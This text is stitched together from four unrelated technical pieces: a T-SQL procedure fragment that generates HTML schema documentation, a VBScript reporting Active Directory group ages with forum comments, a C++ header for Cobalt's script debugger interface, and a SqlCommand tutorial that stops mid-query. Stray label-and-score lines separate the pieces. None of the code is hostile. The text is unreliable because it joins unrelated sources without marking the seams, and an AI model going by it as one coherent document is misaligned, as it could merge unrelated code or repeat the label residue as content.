CONVERT(VARCHAR,c.prec) + ',' + CONVERT(VARCHAR,c.xscale) + ')' WHEN TYPE_NAME(c.xusertype) IN ('char','varchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN length = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,length) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('nchar','nvarchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN c.prec = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,c.prec) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('datetime','money','text','image') THEN TYPE_NAME(c.xusertype) + '' ELSE TYPE_NAME(c.xusertype) + '' END AS DATA_TYPE, case when c.isoutparam =1 then 'Output' else 'Input ' end as "Type" FROM sysobjects o INNER JOIN sysobjects od ON od.id = o.id LEFT OUTER JOIN syscolumns c ON o.id = c.id AND o.type = 'P' WHERE o.name = @SPName OPEN cursor_Params FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' --SET @strHTML = ' ' + @ParamType + ' - ' + @ParamName + ' ' + @ParamDataType + '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType END CLOSE cursor_Params DEALLOCATE cursor_Params IF @Populated = 1 BEGIN insert into #Results (ResultsText) SELECT ' Parameters   ' + ISNULL(convert(varchar(200), @ParamType), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamName), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamDataType), ' ') + '   ' END SET @strHTML = '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @SPTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @SPColDep), ' ') + '  ' + ISNULL(@SPColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepLength), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepScale), ' ') + '  ' + ISNULL(@SPColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp INTO @SPName END CLOSE cursor_sp DEALLOCATE cursor_sp --############################################################################# --functions --############################################################################# SELECT @strHTML = ' Functions ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] IN('FN','TF','IF') AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Functions Exist in ' + db_name() + ' ' DECLARE cursor_sp CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] IN('FN','TF','IF') AND [category] <> 2 ORDER BY [name] OPEN cursor_sp FETCH NEXT FROM cursor_sp INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_spdeps CURSOR FOR SELECT TableSysObjects.name AS [Table],col.name AS [Column],(SELECT top 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype IN('FN','TF','IF') And ViewSysObjects.category = 0 AND ViewSysObjects.name = @SPName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_spdeps FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies IF @SPColDep = '' BEGIN SET @SPColDep = ' ' END SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation END CLOSE cursor_spdeps DEALLOCATE cursor_spdeps --newly added function DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @SPName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @SPName + ' ' insert into #Results (ResultsText) SELECT @strHTML SET @Populated = 0 SET @strHTML1 = ' ' DECLARE cursor_Params CURSOR FOR SELECT rtrim(c.name) PARAMETER , CASE WHEN TYPE_NAME(c.xusertype) IN ('decimal','numeric','float','real') THEN TYPE_NAME(c.xusertype) + ' (' + CONVERT(VARCHAR,c.prec) + ',' + CONVERT(VARCHAR,c.xscale) + ')' WHEN TYPE_NAME(c.xusertype) IN ('char','varchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN length = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,length) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('nchar','nvarchar') THEN TYPE_NAME(c.xusertype) + CASE WHEN c.prec = -1 THEN ' (max)' ELSE ' ('+ CONVERT(VARCHAR,c.prec) + ')' END WHEN TYPE_NAME(c.xusertype) IN ('datetime','money','text','image') THEN TYPE_NAME(c.xusertype) + '' ELSE TYPE_NAME(c.xusertype) + '' END AS DATA_TYPE, case when c.isoutparam =1 then 'Output' else 'Input ' end as "Type" FROM sysobjects o INNER JOIN sysobjects od ON od.id = o.id LEFT OUTER JOIN syscolumns c ON o.id = c.id AND o.type IN('FN','TF','IF') WHERE o.name = @SPName OPEN cursor_Params FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' --SET @strHTML = ' ' + @ParamType + ' - ' + @ParamName + ' ' + @ParamDataType + '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Params INTO @ParamName,@ParamDataType,@ParamType END CLOSE cursor_Params DEALLOCATE cursor_Params IF @Populated = 1 BEGIN insert into #Results (ResultsText) SELECT ' Parameters   ' + ISNULL(convert(varchar(200), @ParamType), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamName), ' ') + '  ' + ISNULL(convert(varchar(200), @ParamDataType), ' ') + '   ' END SET @strHTML = '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @SPTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @SPColDep), ' ') + '  ' + ISNULL(@SPColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepLength), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @SPColDepScale), ' ') + '  ' + ISNULL(@SPColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp INTO @SPName END CLOSE cursor_sp DEALLOCATE cursor_sp SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML SELECT ResultsText FROM #Results ORDER BY ResultsID END --PROC
__label__pos
0.686026
Active Directory Group age (5 Ratings) Description Queries Active Directory to get a list of all user groups, the date it was created and last modified, and writes the output to a CSV file. Useful when cleaning up Active Directory. Note: The script uses rootDSE to bind to the domain in which you are logged into. If you are in a forest scenario and want to bind to the root you can replace ("defaultNamingContext") with ("rootDomainNamingContext"). Source Code This script has not been checked by Spiceworks. Please understand the risks before using it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 '========================================================================== ' Name: GroupAge_AD.vbs ' Author: Jose Cruz (merlinpr) ' Date: 11/04/2009 ' Desc: Queries Active Directory for all group objects and writes the date ' when it was created and last modified to a CSV file. '========================================================================== On Error Resume Next Const ADS_SCOPE_SUBTREE = 2 Set RootDSE = GetObject("LDAP://RootDSE") domainContainer = rootDSE.Get("defaultNamingContext") Set objConnection = CreateObject("ADODB.Connection") Set objCommand = CreateObject("ADODB.Command") objConnection.Provider = "ADsDSOObject" objConnection.Open "Active Directory Provider" Set objCommand.ActiveConnection = objConnection objCommand.Properties("Page Size") = 1000 objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE objCommand.CommandText = _ "SELECT Name, whenChanged, whenCreated FROM 'LDAP://" & domainContainer & "' WHERE objectCategory='group'" Set objRecordSet = objCommand.Execute objRecordSet.MoveFirst Set objFSO = CreateObject("Scripting.FileSystemObject") Set objLogFile = objFSO.CreateTextFile("ADGroups_Age.csv", _ ForWriting, True) Do Until objRecordSet.EOF objLogFile.Write objRecordSet.Fields("Name").Value & "," objLogFile.Write objRecordSet.Fields("whenCreated").Value & "," objLogFile.Write objRecordSet.Fields("whenChanged").Value objLogFile.Writeline objRecordSet.MoveNext Loop objLogFile.Close objRecordset.Close objConnection.Close Join or Login to share what you think! 6 Comments • merlinpr Thai Pepper merlinpr Changed the script to bind to rootDSE insdead of having people type the domain name in the LDAP query manually. Thanks to Martin9700 for the suggestion. I wrote the script very quickly to try to answer a question on a post and got lazy...lol • Shane Fontenot Thai Pepper Shane Fontenot Could you tweak this to show the age of computer accounts? Nice script for getting the age of groups but it would be more helpful if it listed computer account age for AD cleanup. Thanks. • merlinpr Thai Pepper merlinpr shanfont, to check the age of computer accounts you might want to look into OldCmp from Joeware: http://www.joeware.net/freetools/tools/oldcmp/index.htm I could modify the script to do what you asked very easily but OldCmp can do so much more. I recommend you download it and just run (from command line) oldcmp /? so you can see all the options. I use it to check the age of computer accounts and have it save the output to HTML. I must warn you that it is a very powerful tool so be careful if you use it for anything other than reporting. • Castle6342 Pimiento Castle6342 Hi, This is a great script and thanks for posting. I'm wondering what I would have to do to add the description of the Group on the excel sheet. I have tried adding the "description" attribute to the script but it just doesn't work. • Ben6294 Pimiento Ben6294 Massively awesome. You just saved me a lot of time. I would imagine that I can just modify the ' WHERE objectCategory='group'" to ' WHERE objectCategory='Computer'" to get the same info right? • collinmarsden1 Pimiento collinmarsden1 Is there a way to have a "last used" column?
__label__pos
0.581217
blob: e03dcc0598daa16b042cdca1933a094a3a0d8719 [file] [log] [blame] // Copyright 2016 The Cobalt Authors. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #ifndef COBALT_SCRIPT_SCRIPT_DEBUGGER_H_ #define COBALT_SCRIPT_SCRIPT_DEBUGGER_H_ #include <memory> #include <set> #include <string> #include <vector> #include "base/values.h" #include "cobalt/script/call_frame.h" #include "cobalt/script/source_provider.h" namespace cobalt { namespace script { class GlobalEnvironment; // Engine-independent pure virtual interface to a JavaScript debugger. // Used as an opaque interface to the specific debugger implementation, // e.g. JSCDebugger. // Only pure virtual or static methods should be added to this class. // No data members should be added to this class. class ScriptDebugger { public: // Ideally, we want the delegate to do as much as possible, as its // implementation can be independent of the specific JS engine. class Delegate { public: // Called when the script debugger wants to pause script execution. virtual void OnScriptDebuggerPause() = 0; // Called when the script debugger wants to resume script execution, both // after a pause and to start running after the devtools frontend connects. virtual void OnScriptDebuggerResume() = 0; // Called with the response to a previously dispatched protocol message. virtual void OnScriptDebuggerResponse(const std::string& response) = 0; // Called when a debugging protocol event occurs. virtual void OnScriptDebuggerEvent(const std::string& event) = 0; }; // Receives trace events from the JS engine in the JSON Trace Event Format. // https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU class TraceDelegate { public: virtual ~TraceDelegate() {} virtual void AppendTraceEvent(const std::string& trace_event_json) = 0; virtual void FlushTraceEvents() = 0; }; // Possible pause on exceptions states. enum PauseOnExceptionsState { kAll, kNone, kUncaught }; // Used to temporarily override the pause on exceptions state, e.g. to // disable it when executing devtools backend scripts. class ScopedPauseOnExceptionsState { public: ScopedPauseOnExceptionsState(ScriptDebugger* script_debugger, PauseOnExceptionsState state) : script_debugger_(script_debugger) { DCHECK(script_debugger_); stored_state_ = script_debugger_->SetPauseOnExceptions(state); } ~ScopedPauseOnExceptionsState() { script_debugger_->SetPauseOnExceptions(stored_state_); } private: ScriptDebugger* script_debugger_; PauseOnExceptionsState stored_state_; }; // Factory method to create an engine-specific instance. Implementation to be // provided by derived class. static std::unique_ptr<ScriptDebugger> CreateDebugger( GlobalEnvironment* global_environment, Delegate* delegate); // Attach/detach the script debugger. Saved state can be passed between // instances as an opaque string.. virtual void Attach(const std::string& state) = 0; virtual std::string Detach() = 0; // Evaluate JavaScript code that is part of the debugger implementation, such // that it does not get reported as debuggable source. Returns true on // success, false if there is an exception. If out_result_utf8 is non-NULL, it // will be set to hold the result of the script evaluation if the script // succeeds, or an exception message if it fails. virtual bool EvaluateDebuggerScript(const std::string& js_code, std::string* out_result_utf8) = 0; // For engines like V8 that directly handle protocol commands. virtual std::set<std::string> SupportedProtocolDomains() = 0; virtual bool DispatchProtocolMessage(const std::string& method, const std::string& message) = 0; // Creates a JSON representation of an object. // https://chromedevtools.github.io/devtools-protocol/1-3/Runtime#type-RemoteObject virtual std::string CreateRemoteObject(const ValueHandleHolder& object, const std::string& group) = 0; // Lookup the object ID that was in the JSON from |CreateRemoteObject| and // return the JavaScript object that it refers to. // https://chromedevtools.github.io/devtools-protocol/1-3/Runtime#type-RemoteObject virtual const script::ValueHandleHolder* LookupRemoteObjectId( const std::string& object_id) = 0; // For performance tracing of JavaScript methods. virtual void StartTracing(const std::vector<std::string>& categories, TraceDelegate* trace_delegate) = 0; virtual void StopTracing() = 0; virtual PauseOnExceptionsState SetPauseOnExceptions( PauseOnExceptionsState state) = 0; // Returns the previous state. protected: virtual ~ScriptDebugger() {} friend std::unique_ptr<ScriptDebugger>::deleter_type; }; } // namespace script } // namespace cobalt #endif // COBALT_SCRIPT_SCRIPT_DEBUGGER_H_
__label__pos
0.934471
How to close the modal dialog of a UI Kit 2 Confluence ContentAction? Dear Community, I would like to create a Confluence ContentAction with UI Kit 2. The following skeleton gets rendered correctly as a Content Action inside a ModalDialog, and due to the presence of a Form, we already get a Submit button rendered normally, right aligned, next to the default Cancel button. However, clicking the Submit button (thereby setting isOpen to false), results in only the form (incl. the Submit button) disappearing, the ModalDialog itself, however, stays open. 1. How is it possible to close it with the Submit button, or for that matter, any custom button or action other than the automatically added Cancel button? (The default Cancel button closes the ModalDialog correctly) 2. Is it possible to rename the default Cancel button to anything else? (like No, Abort, Exit, Close, etc.) const ContentActionDialog = () => { const [isOpen, setOpen] = useState(true); if (!isOpen) { return null; } else { return ( <> <Form onSubmit={data => { console.log("Submit clicked"); setOpen(false); }}> <Text>Some text</Text> </Form> </> ); } } ForgeReconciler.render( <React.StrictMode> <ContentActionDialog/> </React.StrictMode> ); By the way, returning a ModalDialog from the ContentActionDialog function above results in two modal dialogs opening on the top of each other, so I suppose it is correct that I am only returning the contents of the ModalDialog here. I have also tried view.close() (as the view object from @forge/bridge is available in UI Kit 2), but to no avail 2 Likes The reason that the form disappears is that you are returning null when isOpen is false, which renders nothing. I’m also interested in whether it’s possible to close a UI Kit 2 view programatically. As mentioned above, calling view.close doesn’t work. For example, I created this confluence:contentAction using UI Kit 2: import React from "react"; import ForgeReconciler, { Form, TextField } from "@forge/react"; import { view } from "@forge/bridge"; const App = () => { return ( <Form onSubmit={() => { view.close().catch((e) => { console.log("error closing", e); }); }} > <TextField name="username" label="Username" /> </Form> ); }; ForgeReconciler.render( <React.StrictMode> <App /> </React.StrictMode> ); which looks like this: when submitting the form, the following is logged: [Log] error closing – Error: this resource's view is not closable. (main.js, line 2) I’ve also tested a bitbucket:repoCodeOverviewAction which rejects the close promise with the same error. cc @ddraper @QuocLieu can see that you’ve worked on UI Kit 2 so wondering whether you may know? 1 Like Hi @joshp , the view.close call is primarily used for Custom UI modals . Unfortunately at this point in time, the cancel button is the only way to close the modal. A feature request for this can be logged here Thanks very much for the response @QuocLieu - have opened FRGE-1333. 1 Like
__label__pos
0.992298
234-4313 Upstream Oxygen Sensor Why the 234-4313 Upstream Oxygen Sensor is Crucial for Your 2005-2006 Nissan Frontier 4.0 V6? Greetings to all automobile enthusiasts and Nissan Frontier owners! In the realm of automotive engineering, precision is paramount. Amidst the array of components that contribute to your vehicle’s performance, the 234-4313 upstream oxygen sensor holds a pivotal place. This article is dedicated to shedding light on why the 234-4313 upstream oxygen sensor is crucial for the 2005-2006 Nissan Frontier 4.0 V6 model. Join us as we delve into the intricate role this sensor plays in enhancing your driving experience and optimizing the performance of your beloved Nissan Frontier. 234-4313 upstream oxygen sensor can Enhancing Combustion Efficiency The Heart of the Powerplant At the heart of every vehicle lies the engine, a symphony of components working in harmony to generate power. The 234-4313 upstream oxygen sensor—also referred to as an O2 sensor—plays a vital role in this symphony. Positioned in the exhaust manifold, this sensor monitors the oxygen content in the exhaust gases and relays this information to the engine control module (ECM). The ECM, in turn, adjusts the air-fuel mixture to achieve optimal combustion efficiency. Optimizing Fuel Economy Efficient combustion directly influences fuel economy. The precision provided by the 234-4313 upstream oxygen sensor ensures that the air-fuel mixture is accurately calibrated. This results in complete combustion, delivering better power output and reducing fuel consumption. With this sensor in place, every journey in your Nissan Frontier becomes an exercise in maximizing fuel efficiency. 234-4313 upstream oxygen sensor can Emission Control and Environmental Responsibility A Guardian of Emission Levels Environmental consciousness is a driving force in modern automotive engineering. The 234-4313 upstream oxygen sensor contributes significantly to this endeavor by aiding in emission control. Accurate combustion, facilitated by precise oxygen level monitoring, minimizes the emission of harmful pollutants. This aligns perfectly with stringent emission standards and echoes the commitment to cleaner air and a healthier planet. 234-4313 upstream oxygen sensor can Preserving Engine Longevity Detecting Potential Issues The 234-4313 upstream oxygen sensor is not only a guardian of combustion efficiency but also a diagnostic tool. Deviations from the optimal air-fuel mixture can indicate potential engine issues or malfunctioning components. Detecting these irregularities early can prevent potential damage, safeguarding the longevity of your 2005-2006 Nissan Frontier 4.0 V6. Conclusion In conclusion, the 234-4313 upstream oxygen sensor proves its worth as a cornerstone of automotive precision. From enhancing combustion efficiency to promoting emission control and detecting potential issues, this sensor is a testament to the synergy of technology and responsible engineering. As you navigate the roads in your 2005-2006 Nissan Frontier 4.0 V6, remember that the 234-4313 upstream oxygen sensor is working diligently to ensure a harmonious blend of performance, efficiency, and environmental consciousness. Embrace the excellence of automotive engineering and responsible driving, knowing that every mile is powered by the precision and functionality of the 234-4313 upstream oxygen sensor. Leave a Comment
__label__pos
0.993302
[Development] new "debugsupport" module and API Ulf Hermann ulf.hermann at digia.com Mon May 12 12:33:28 CEST 2014 > I guess using a TCP connection would still be possible, but not be the defaut anymore for local debugging/profiling? The QDebugServer so far supports four kinds of connections and it's possible to add more. You can use local or tcp connections and both allow you to establish them in either direction. E.g. the QDebugClient can open a QDebug{Local|Tcp}ServerConnection and the QDebugServer can connect to that using the respective client connection. The QQmlDebugServer (which wraps a QDebugServer) parses an additional command line argument "name" and will use a QDebugLocalServerConnection if it's found. QtCreator doesn't support that, yet, but it would be easy to add it. So, currently the default is still TCP and we can't really change that for applications using older versions of Qt. However, we can make QtCreator detect if the application supports local connections and use them where possible. regards, Ulf More information about the Development mailing list
__label__pos
0.682869
Any tips for pushing changes from a staging site to a live site? #1 I’ve read the documentation, where they suggest just cloning the app, but I’m not clear on what this does to IP addresses and SSL certificates. How do other people handle this? Does Cloudways have any improved tools for this in the works? #2 Hi @paul.raphaelson I would suggest having a look at the comments section on WordPress staging post. #3 I am not a tech savvy, I don’t use Git for version controlling or anything like that. What I do is clone websites that require major changes on a different application on same server. Once the changes are done on the dev site I import latest data from the live site to dev site and then point domain to dev site. After that I apply SSL and configure contact forms. I know that is a lot more work, but that is how I approach it. I usually keep old website copy as backup and mark it with a date. #4 Hi Talon, I am about to do the same and follow your steps in swapping live with staging. What do mean by import the latest data? How do you do that? Do you just assign the domain of the live site to the staging site? Since the IP is the same, the domain name will now point to the new application?
__label__pos
0.983729
 Principle of operation of welding transformers How do welding transformers work? Welding transformers apply to the contact and arc elektroyosvarka. The short circuit of secondary winding of the transformer is the noryomalny operating mode at contact welding (at contact of elektyorod) and often arises at arc. Схема устройства сварочного трансформатора Scheme of the device of the welding transformer. For restriction of currents of KZ welding transformers build with the big induced resistance and rather low power factor. Increase in induced resistance the obmoyotok of the welding transformer can be reached by either application of the speyotsialny design of windings, or inclusion of additional inductance in the chain secondary (or primary) the winding. Increase in induced resistances of windings in the transformer is reached by increase in flows the rasseyayoniya for what transformer winding places on different rods of the magnetic conductor or in different places on rod height. Схемы устройства и принцип работы сварочных трансформаторов Figure 1. Schemes of the device and principle of operation of welding transformers. Turning on of magnetic shunts in the magnetic conductor (fig. 1a) the rasseyayoniya and induced resistance of transformer winding also sharply increases flows. Transformers for contact welding do with the secondary winding consisting of one round on which tension usually does not exceed 14 Century. For regulation of the current proceeding through the welded part, primary winding of the welding transyoformator has several conclusions which switching allows to change number of rounds of the winding. Now the welding transformers intended for arc electric welding have the widest circulation. Such transforyomator build on the secondary voltage of 60-70 V (tension of ignition of the arch). Feature of operation of these transformers is the intermittent duty of work with abrupt junctions from no-load operation to the short circuit, and back. Minor changes of current and considerable inductance in welding chains are necessary for steady and continuous burning of the arch. For regulation of current in the welding chain consistently with secondary winding of the transformer vklyuyochat the inductive coil with the steel magnetic conductor (fig. 1b). Velichiyona of the welding current depends on diameter of the electrode and is regulated by the condensance of the inductive coil which depends on the size of air gap And. Increase in air gap in the magnetic conductor of the inductive coil causes reduction of its condensance owing to what current in the svayorochny chain raises. Sometimes inductive coils combine in the single whole with the welding transformer. COMMENTS • To add the comment 0000000000000000 Top
__label__pos
0.798949
Condensed Matter Experiments Course content This course provides an introduction to selected techniques used in experimental condensed matter physics. The intention is to prepare the student for graduate level course work and experimental research in the fields of low-temperature solid state physics, semiconducting quantum devices, neutron scattering and X-ray diffraction. The students will learn key concepts that are essential in these fields and, more generally, have advanced their understanding of materials anywhere from quantum engineering over advanced functional materials to biophysics and chemistry.   Topics: Operating principles of a modern cryostat, cooling methods, heat transfer at cryogenic temperatures, and the physics of thermometry. Basic concepts of current flow at low temperatures, and resistance of metals and semiconductors. Brief introduction to the fabrication of crystals, heterostructures, and nanostructures. Methods of measuring accurately electrical and magnetic properties of a sample, including conductance and noise. Introduction to scattering methods, using light, X-ray and neutron beams. Concepts of interaction between matter and radiation, and its description by scattering functions. Introduction to methods of small angle scattering, diffraction and spectroscopy.   The course will be a combination of lectures, exercises, discussions of new experimental breakthroughs from literature, and a small number of laboratory experiments. The student is expected to actively take part in all activities, and gain a background for pursuing experimental work in local groups dedicated to the physics of quantum devices, X-ray and neutron scattering. Education MSc Programme in Physics MSc Programme in Physics w. minor subject Learning outcome Skills: After the course the student is expected to have the following skills: • Describe the properties of gaseous and liquid helium and nitrogen, and differentiate between 3He and 4He at low temperatures. • Identify the main components of a cryostat, and explain physical properties of solids that are relevant for the conduction and isolation of heat. • Explain the temperature dependence of electron-phonon coupling, and its implications for achieving low electron temperatures in quantum devices. • Describe different ways of measuring cryogenic electron and phonon temperatures. • Explain resistivity, resistance, conductivity, conductance, magnetic susceptibility. • Explain the concept of a semiconducting heterostructure, and the role of doping. • Explain two- and four-terminal measurements, lock-in detection, and basic concepts of electrical noise. • Explain principles of amplifiers, shielding, and the identification and elimination of extrinsic noise sources. • Explain the concept of coherence, and how it relates to particles and waves. Explain typical scales for coherence time and coherence lengths of solid state electrons, X-rays and neutrons. • Explain fundamental optical properties of X-ray and neutron radiation and its interaction with solids. • Establish formulas for the scattering function, and standard steps in the analysis of scattering data. • Work in small teams and efficiently perform an experiment, analyze the data and find a convincing interpretation. Communicate the results in a written document that places the findings into the context of what was known or expected before the experiment, and how they inform other experiments or raise important questions. Knowledge: After the course the student will be familiar with physical concepts that address the behavior of solids at low temperature, the flow of heat and electrical carriers, and the propagation of X-rays and neutrons. The student will know how interactions can be described by elastic and inelastic scattering, and the important role of coherence and interference. Most importantly, the student will understand how these theoretical concepts connect to key experimental methods used in the daily life of experimental groups dedicated to solid state quantum devices, neutron scattering and x-ray diffraction. Discussions of hot-off-the-press experimental literature and/or hands-on experiments in the course laboratory will prepare the young scientist for a smooth transition into an experimental research group. Competences: This course will provide the students with a background for further studies specializing in the physics and applications of quantum devices, X-ray and neutron scattering. The students will gain insight into the real-life execution of scientific experiments and the teamwork and software tools necessary to analyze and report results, in preparation for pursuing for example an experimental M.Sc. project. Lectures, exercises, group work, selected scientific articles and/or hands-on experiments. will be announced in Absalon Familiarity with quantum mechanics, condensed matter physics, statistical physics. ECTS 7,5 ECTS Type of assessment Oral examination, 20 minutes Oral examination (20 minutes, without time for preparation), covers content of course and written reports. Aid All aids allowed Marking scale 7-point grading scale Censorship form No external censorship Several internal examiners. Criteria for exam assessment see learning outcome Single subject courses (day) • Category • Hours • Lectures • 43,5 • Exercises • 48 • Preparation • 114 • Exam • 0,5 • English • 206,0
__label__pos
0.992029
encodings Converts between different character encodings. On UNIX, this uses the iconv library, on Windows the Windows API. Types EncodingConverter = object dest, src: CodePage   Source Edit EncodingError = object of ValueError exception that is raised for encoding errors   Source Edit Procs proc getCurrentEncoding(): string {...}{.raises: [], tags: [].} retrieves the current encoding. On Unix, always "UTF-8" is returned.   Source Edit proc open(destEncoding = "UTF-8"; srcEncoding = "CP1252"): EncodingConverter {...}{. raises: [OverflowError, EncodingError], tags: [].} opens a converter that can convert from srcEncoding to destEncoding. Raises IOError if it cannot fulfill the request.   Source Edit proc close(c: EncodingConverter) {...}{.raises: [], tags: [].} frees the resources the converter c holds.   Source Edit proc convert(c: EncodingConverter; s: string): string {...}{.raises: [OSError], tags: [].} converts s to destEncoding that was given to the converter c. It assumed that s is in srcEncoding.   Source Edit proc convert(s: string; destEncoding = "UTF-8"; srcEncoding = "CP1252"): string {...}{. raises: [OverflowError, EncodingError, OSError], tags: [].} converts s to destEncoding. It assumed that s is in srcEncoding. This opens a converter, uses it and closes it again and is thus more convienent but also likely less efficient than re-using a converter.   Source Edit
__label__pos
0.997449
SqlCommands: What to choose between SqlDataAdapter, ExecuteScalar and ExecuteNonQuery SqlCommand class can be used in various ways to access database data and it’s true story that many developers are somehow confused in which one to choose each time the want to execute queries in the SQL Server. In this post we will try to make this clear and show the best practices to access your database using one of the following commands: 1. SqlDataAdapter.Fill 2. ExecuteScalar 3. ExecuteNonQuery Let’s start. Create a simple Console Application project and open the Program.cs file. Make sure you add using statements for the following namespaces. These are all you need to execute queries using the SqlCommand class. using System.Data; using System.Data.SqlClient; Let us first create a Database with a simple table, so we can run our queries. Create a database named SchoolDB and add a simple table as follow: sqlcommands-01 Make sure not to mark the StudentID column as an Identity. SqlDataAdapter.Fill SqlDataAdapter class is used to retrieve a dataset from the database. That is when you want to get multiple results from your database you can make use of SqlDataAdapter.Fill(DataSet ds) function. In the select query you can have as many SELECT statements you want. If you do so, the first SELECT result set will fill the first DataSet’s table, the Second SELECT statement the second table and so on.. For the simplicity of this post, first we will add some records (students) to the Students table and then we will create a stored procedure to retrieve them. In the C# code, we’ ll use the SqlDataAdapter to fill a DataSet with all the Students in the SchoolDB. INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (1,'Chris S.',28) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (2,'Catherin',23) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (3,'Nick',30) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (4,'Maria',40) CREATE PROCEDURE GetStudents AS BEGIN SELECT * FROM dbo.Students END Add a GetStudents function in the Program.cs file as follow and run in through the main method. Also, make sure you define your connection string that points to your SQL Server. const string sqlConnectionString = "Data Source=localhost;Initial Catalog=SchoolDB;Integrated Security=SSPI;"; // Retrieve multiple records using an SqlDataAdapter public static DataSet GetStudents() { DataSet dsStudents = new DataSet(); using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("GetStudents", con); cmd.CommandType = CommandType.StoredProcedure; SqlDataAdapter da = new SqlDataAdapter(cmd); try { da.Fill(dsStudents); dsStudents.Tables[0].TableName = "Students"; } catch (Exception) { return dsStudents; } } return dsStudents; } sqlcommands-02 ExecuteScalar ExecuteScalar function is the best option to figure out the result of your executed query in the database. Let me explain it a little further. What I meant is that you use the ExecuteScalar command when you don’t care to read or retrieve a result set from your dabase but you expect a code description of what actually happened. Let’s see it on action now. Create another stored procedure named AddStudent in order to add Student records in the respective table. This procedure though has some limitations. 1. You cannot add a record with ID that is already in the table (primary key) 2. You cannot add an invalid Student Age 3. The Idea is to return a different result code foreach scenario so that you can handle it on the server side CREATE PROCEDURE [dbo].[AddStudent] @studentID int, @studentName nvarchar(50), @studentAge int AS BEGIN DECLARE @result int = 0; DECLARE @tempID int; SET @tempID = (SELECT StudentID FROM dbo.Students WHERE StudentID = @studentID) IF @tempID IS NOT NULL SET @result = -1 -- There is already a student with this ID ELSE IF @studentAge < 5 OR @studentAge > 120 SET @result = -2 -- Invalid Age number ELSE INSERT INTO 